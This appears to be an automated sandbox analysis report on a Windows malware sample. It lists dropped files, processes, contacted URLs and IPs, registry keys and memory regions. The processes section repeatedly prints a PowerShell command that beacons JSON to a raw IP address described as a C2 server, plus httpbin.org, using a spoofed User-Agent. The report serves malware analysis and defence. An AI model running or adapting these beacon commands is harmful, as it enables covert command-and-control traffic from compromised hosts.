Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
|
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13to5vl5.qjb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ar5cncj.aol.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agnoeq0v.q4h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aio0ubsg.ixi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfpavd4s.aei.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlvipkkl.bcf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmcuaaj5.oof.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnmsewhx.qgh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx4dkhw4.z0q.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp4ibco5.rsx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmlrqvwh.mlt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfakr5b5.h23.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic,
which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server,
among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType
\"application/json\""
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic,
which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server,
among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType
\"application/json\""
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic,
which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server,
among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType
\"application/json\""
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic,
which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server,
among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType
\"application/json\""
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic,
which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server,
among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType
\"application/json\""
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT
10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic,
which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server,
among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType
\"application/json\""
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://httpbin.org/post
|
107.22.40.220
|
||
http://44.207.250.251
|
unknown
|
||
http://httpbin.org
|
unknown
|
||
http://44.207.250.251/post
|
44.207.250.251
|
||
http://httpbin.o
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://44.207.250.251/post34282f2a34282f2b356a75696e.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
|
unknown
|
||
https://go.micro
|
unknown
|
||
http://www.microsoft.co
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmd
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://httpbin.org/post8
|
unknown
|
||
http://httpbin.org/post873743475687d356a75696e
|
unknown
|
||
https://github.com/Pester/Pesterp
|
unknown
|
||
http://crl.micro
|
unknown
|
||
http://httpbin.org/post873743475687d356a75696eC:
|
unknown
|
||
http://44.207.250.251/postPATHEXTPATHEXT=::=::
|
unknown
|
||
http://44.207.250.251/post34282f2a34282f2b356a75696e
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://www.apache.org/licenses/LICE
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://httpbin.org/postmplant
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://44.207.250.251/postPATHEXTC:
|
unknown
|
||
http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmdpower
|
unknown
|
||
http://httpbin.org/post873743475687d356a75696ehttp://httpbin.org/postpowershell.exe.compowershell.ex
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
httpbin.org
|
107.22.40.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
107.22.40.220
|
httpbin.org
|
United States
|
||
44.207.250.251
|
unknown
|
United States
|
||
34.236.15.216
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
2009D7B0000
|
heap
|
page read and write
|
||
5382879000
|
stack
|
page read and write
|
||
1F4223DA000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
2084884B000
|
trusted library allocation
|
page read and write
|
||
1F422AAA000
|
trusted library allocation
|
page read and write
|
||
1DCA9198000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD7A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA4C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BD90000
|
trusted library allocation
|
page read and write
|
||
20085585000
|
trusted library allocation
|
page read and write
|
||
6F740F7000
|
stack
|
page read and write
|
||
16681C40000
|
heap
|
page read and write
|
||
63C4FFE000
|
stack
|
page read and write
|
||
1F180001000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
1F421A60000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA46000
|
trusted library allocation
|
page read and write
|
||
1DC853B6000
|
trusted library allocation
|
page read and write
|
||
A60000
|
unkown
|
page readonly
|
||
7FFD9BB22000
|
trusted library allocation
|
page read and write
|
||
C25DDB8000
|
stack
|
page read and write
|
||
1F1EA16A000
|
heap
|
page read and write
|
||
C000096000
|
direct allocation
|
page read and write
|
||
C000152000
|
direct allocation
|
page read and write
|
||
1F1E9F93000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
200835B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBAC000
|
trusted library allocation
|
page read and write
|
||
1DC9D090000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD13000
|
trusted library allocation
|
page read and write
|
||
1F180C32000
|
trusted library allocation
|
page read and write
|
||
6F73EFF000
|
stack
|
page read and write
|
||
C25DC79000
|
stack
|
page read and write
|
||
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
1DCA8800000
|
trusted library allocation
|
page read and write
|
||
20848260000
|
heap
|
page read and write
|
||
6F74ECD000
|
stack
|
page read and write
|
||
63C4BFD000
|
stack
|
page read and write
|
||
7FFD9BD66000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB04000
|
trusted library allocation
|
page read and write
|
||
1F1E9860000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
1F1EA175000
|
heap
|
page read and write
|
||
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
538257E000
|
stack
|
page read and write
|
||
1DC84F43000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
1F421B00000
|
heap
|
page execute and read and write
|
||
C000010000
|
direct allocation
|
page read and write
|
||
1DC94F73000
|
trusted library allocation
|
page read and write
|
||
20846960000
|
heap
|
page read and write
|
||
208491D7000
|
trusted library allocation
|
page read and write
|
||
C0000AC000
|
direct allocation
|
page read and write
|
||
C000088000
|
direct allocation
|
page read and write
|
||
7FFD9BD80000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB1B000
|
trusted library allocation
|
page read and write
|
||
20860AF8000
|
heap
|
page read and write
|
||
7FFD9BCE2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
1F43A2A8000
|
heap
|
page read and write
|
||
7FFD9BCE9000
|
trusted library allocation
|
page read and write
|
||
6F74E4E000
|
stack
|
page read and write
|
||
2084699C000
|
heap
|
page read and write
|
||
208608F3000
|
heap
|
page read and write
|
||
7FFD9BB01000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD90000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
C25DB7E000
|
stack
|
page read and write
|
||
A1E6E3E000
|
stack
|
page read and write
|
||
B7D000
|
unkown
|
page readonly
|
||
6F74079000
|
stack
|
page read and write
|
||
7FFD9BAA9000
|
trusted library allocation
|
page read and write
|
||
1DCB877C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
20083525000
|
heap
|
page read and write
|
||
C00010A000
|
direct allocation
|
page read and write
|
||
1F1817C6000
|
trusted library allocation
|
page read and write
|
||
C0000B8000
|
direct allocation
|
page read and write
|
||
1F4225FC000
|
trusted library allocation
|
page read and write
|
||
C000018000
|
direct allocation
|
page read and write
|
||
1F1E9E06000
|
heap
|
page read and write
|
||
7FFD9BD65000
|
trusted library allocation
|
page read and write
|
||
208469BC000
|
heap
|
page read and write
|
||
2008557B000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD0D000
|
trusted library allocation
|
page read and write
|
||
1DCA6840000
|
heap
|
page read and write
|
||
C000050000
|
direct allocation
|
page read and write
|
||
7FFD9BD0D000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
C05000
|
unkown
|
page read and write
|
||
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCF6000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
2009D557000
|
heap
|
page read and write
|
||
7FFD9BB31000
|
trusted library allocation
|
page read and write
|
||
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
63C5BCE000
|
stack
|
page read and write
|
||
208491C7000
|
trusted library allocation
|
page read and write
|
||
1DC9D0D8000
|
heap
|
page read and write
|
||
C000130000
|
direct allocation
|
page read and write
|
||
1F18199D000
|
trusted library allocation
|
page read and write
|
||
C25DAFF000
|
stack
|
page read and write
|
||
7FFD9BD5A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
1DC831B8000
|
heap
|
page read and write
|
||
1F43A047000
|
heap
|
page read and write
|
||
1DC9D139000
|
heap
|
page read and write
|
||
208609E0000
|
heap
|
page read and write
|
||
C0000E0000
|
direct allocation
|
page read and write
|
||
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD43000
|
trusted library allocation
|
page read and write
|
||
1DC84F4B000
|
trusted library allocation
|
page read and write
|
||
1F1E9975000
|
heap
|
page read and write
|
||
1DC85D00000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
1DCA6944000
|
heap
|
page read and write
|
||
1F420151000
|
heap
|
page read and write
|
||
C00007E000
|
direct allocation
|
page read and write
|
||
7FFD9BA46000
|
trusted library allocation
|
page read and write
|
||
2084923E000
|
trusted library allocation
|
page read and write
|
||
6F742FE000
|
stack
|
page read and write
|
||
C000002000
|
direct allocation
|
page read and write
|
||
1DCC08BD000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD2C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
1F1E8066000
|
heap
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
C25D9FF000
|
stack
|
page read and write
|
||
1F1E9880000
|
trusted library allocation
|
page read and write
|
||
C25DF3F000
|
stack
|
page read and write
|
||
1F4200FC000
|
heap
|
page read and write
|
||
16681D20000
|
heap
|
page read and write
|
||
1F4227E6000
|
trusted library allocation
|
page read and write
|
||
C0000B6000
|
direct allocation
|
page read and write
|
||
20858750000
|
trusted library allocation
|
page read and write
|
||
5382BBE000
|
stack
|
page read and write
|
||
1F1E9890000
|
heap
|
page readonly
|
||
1DC84EF0000
|
heap
|
page execute and read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD30000
|
trusted library allocation
|
page read and write
|
||
63C4DF8000
|
stack
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD98000
|
trusted library allocation
|
page read and write
|
||
1F1E7E30000
|
heap
|
page read and write
|
||
A1E697E000
|
stack
|
page read and write
|
||
1F4200C5000
|
heap
|
page read and write
|
||
7FFD9BD05000
|
trusted library allocation
|
page read and write
|
||
208491DF000
|
trusted library allocation
|
page read and write
|
||
1DCB876E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
1F1E7FAC000
|
heap
|
page read and write
|
||
C000016000
|
direct allocation
|
page read and write
|
||
1DCC0A73000
|
heap
|
page read and write
|
||
7FFD9BD35000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
1DC83100000
|
heap
|
page read and write
|
||
1F1E7F30000
|
heap
|
page read and write
|
||
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
2008352E000
|
heap
|
page read and write
|
||
C00003E000
|
direct allocation
|
page read and write
|
||
1F422138000
|
trusted library allocation
|
page read and write
|
||
21FF3FD000
|
stack
|
page read and write
|
||
C25DA7D000
|
stack
|
page read and write
|
||
21FF9FD000
|
stack
|
page read and write
|
||
208469E3000
|
heap
|
page read and write
|
||
A1E6EBF000
|
stack
|
page read and write
|
||
63C4F79000
|
stack
|
page read and write
|
||
7FFD9BD80000
|
trusted library allocation
|
page read and write
|
||
C00009A000
|
direct allocation
|
page read and write
|
||
7FFD9B982000
|
trusted library allocation
|
page read and write
|
||
20083628000
|
heap
|
page read and write
|
||
1DC85988000
|
trusted library allocation
|
page read and write
|
||
2009D6A7000
|
heap
|
page execute and read and write
|
||
7FFD9BDE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
166A7840000
|
direct allocation
|
page read and write
|
||
7FFD9BD93000
|
trusted library allocation
|
page read and write
|
||
2008557F000
|
trusted library allocation
|
page read and write
|
||
5382473000
|
stack
|
page read and write
|
||
1DCA875D000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
1DCC0893000
|
heap
|
page read and write
|
||
6F73DFF000
|
stack
|
page read and write
|
||
1F1EA027000
|
heap
|
page execute and read and write
|
||
7FFD9BD1C000
|
trusted library allocation
|
page read and write
|
||
200953A1000
|
trusted library allocation
|
page read and write
|
||
1F422A58000
|
trusted library allocation
|
page read and write
|
||
A1E6B3F000
|
stack
|
page read and write
|
||
1DCA8330000
|
heap
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
6F7437E000
|
stack
|
page read and write
|
||
1DCA8EC6000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
C12000
|
unkown
|
page read and write
|
||
7FFD9BADF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
20085579000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
20860869000
|
heap
|
page read and write
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
1F1E98D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
1DC856C4000
|
trusted library allocation
|
page read and write
|
||
6F73E7C000
|
stack
|
page read and write
|
||
7FFD9BDB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
C79000
|
unkown
|
page readonly
|
||
1F1E9DA0000
|
heap
|
page execute and read and write
|
||
1DC83110000
|
trusted library allocation
|
page read and write
|
||
1F181622000
|
trusted library allocation
|
page read and write
|
||
C25DE3E000
|
stack
|
page read and write
|
||
1F422123000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD03000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
1DC94F01000
|
trusted library allocation
|
page read and write
|
||
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
C000025000
|
direct allocation
|
page read and write
|
||
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
1F1E9F5F000
|
heap
|
page read and write
|
||
7FFD9BB25000
|
trusted library allocation
|
page read and write
|
||
C000074000
|
direct allocation
|
page read and write
|
||
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
1F43A0DF000
|
heap
|
page read and write
|
||
1F43A156000
|
heap
|
page execute and read and write
|
||
C0000A8000
|
direct allocation
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
1DCA6740000
|
heap
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
7DF439B20000
|
trusted library allocation
|
page execute and read and write
|
||
5382ABE000
|
stack
|
page read and write
|
||
20860AD0000
|
heap
|
page read and write
|
||
21FEED3000
|
stack
|
page read and write
|
||
1DCA83B5000
|
heap
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
20848C23000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBF3000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD34000
|
trusted library allocation
|
page read and write
|
||
20860B38000
|
heap
|
page read and write
|
||
1F422AAD000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD90000
|
trusted library allocation
|
page read and write
|
||
7DF40C6B0000
|
trusted library allocation
|
page execute and read and write
|
||
1F432021000
|
trusted library allocation
|
page read and write
|
||
1F1902F0000
|
trusted library allocation
|
page read and write
|
||
C00007A000
|
direct allocation
|
page read and write
|
||
7FFD9BD68000
|
trusted library allocation
|
page read and write
|
||
1F181632000
|
trusted library allocation
|
page read and write
|
||
1DC9D087000
|
heap
|
page execute and read and write
|
||
20848855000
|
trusted library allocation
|
page read and write
|
||
1F1E9DF0000
|
heap
|
page read and write
|
||
20848840000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD36000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD0F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD5000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB32000
|
trusted library allocation
|
page read and write
|
||
20858741000
|
trusted library allocation
|
page read and write
|
||
20085856000
|
trusted library allocation
|
page read and write
|
||
20860878000
|
heap
|
page read and write
|
||
1F1E9FF1000
|
heap
|
page read and write
|
||
C0000B4000
|
direct allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
C00009E000
|
direct allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
A1E6C39000
|
stack
|
page read and write
|
||
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
C000090000
|
direct allocation
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
63C5C4D000
|
stack
|
page read and write
|
||
1DC8502B000
|
trusted library allocation
|
page read and write
|
||
2084699E000
|
heap
|
page read and write
|
||
C0000AA000
|
direct allocation
|
page read and write
|
||
7FFD9BDD0000
|
trusted library allocation
|
page read and write
|
||
20084F90000
|
heap
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page execute and read and write
|
||
200857E0000
|
trusted library allocation
|
page read and write
|
||
2009D5F0000
|
heap
|
page read and write
|
||
7FFD9BC4D000
|
trusted library allocation
|
page read and write
|
||
1DCA68C0000
|
heap
|
page read and write
|
||
C13000
|
unkown
|
page write copy
|
||
63C4CFE000
|
stack
|
page read and write
|
||
C000136000
|
direct allocation
|
page read and write
|
||
21FEF5D000
|
stack
|
page read and write
|
||
7FFD9BD13000
|
trusted library allocation
|
page read and write
|
||
1DC849E0000
|
heap
|
page readonly
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
1DC85068000
|
trusted library allocation
|
page read and write
|
||
1F1E9910000
|
trusted library allocation
|
page read and write
|
||
C00012C000
|
direct allocation
|
page read and write
|
||
16681C84000
|
direct allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
6F73F7E000
|
stack
|
page read and write
|
||
7FFD9BD3A000
|
trusted library allocation
|
page read and write
|
||
1F1817BD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
21FEFDF000
|
stack
|
page read and write
|
||
16681CF0000
|
direct allocation
|
page read and write
|
||
7FFD9BD76000
|
trusted library allocation
|
page read and write
|
||
1DCC0A20000
|
heap
|
page read and write
|
||
1F420188000
|
heap
|
page read and write
|
||
C0000B0000
|
direct allocation
|
page read and write
|
||
7FFD9BD55000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
1DC9D14C000
|
heap
|
page read and write
|
||
2009D574000
|
heap
|
page read and write
|
||
7FFD9BD4A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD5F000
|
trusted library allocation
|
page read and write
|
||
1DC83170000
|
heap
|
page read and write
|
||
7FFD9BCE6000
|
trusted library allocation
|
page read and write
|
||
200853FD000
|
trusted library allocation
|
page read and write
|
||
2009D7FB000
|
heap
|
page read and write
|
||
A1E6CB8000
|
stack
|
page read and write
|
||
1F43A065000
|
heap
|
page read and write
|
||
200854B4000
|
trusted library allocation
|
page read and write
|
||
1DC8316C000
|
heap
|
page read and write
|
||
C74000
|
unkown
|
page readonly
|
||
C74000
|
unkown
|
page readonly
|
||
1F43A270000
|
heap
|
page read and write
|
||
16681C89000
|
direct allocation
|
page read and write
|
||
7FFD9BBD6000
|
trusted library allocation
|
page read and write
|
||
1F1E7FBC000
|
heap
|
page read and write
|
||
20848710000
|
heap
|
page execute and read and write
|
||
C000124000
|
direct allocation
|
page read and write
|
||
2008549C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
1DC9D2DA000
|
heap
|
page read and write
|
||
208469A8000
|
heap
|
page read and write
|
||
1DC849D0000
|
trusted library allocation
|
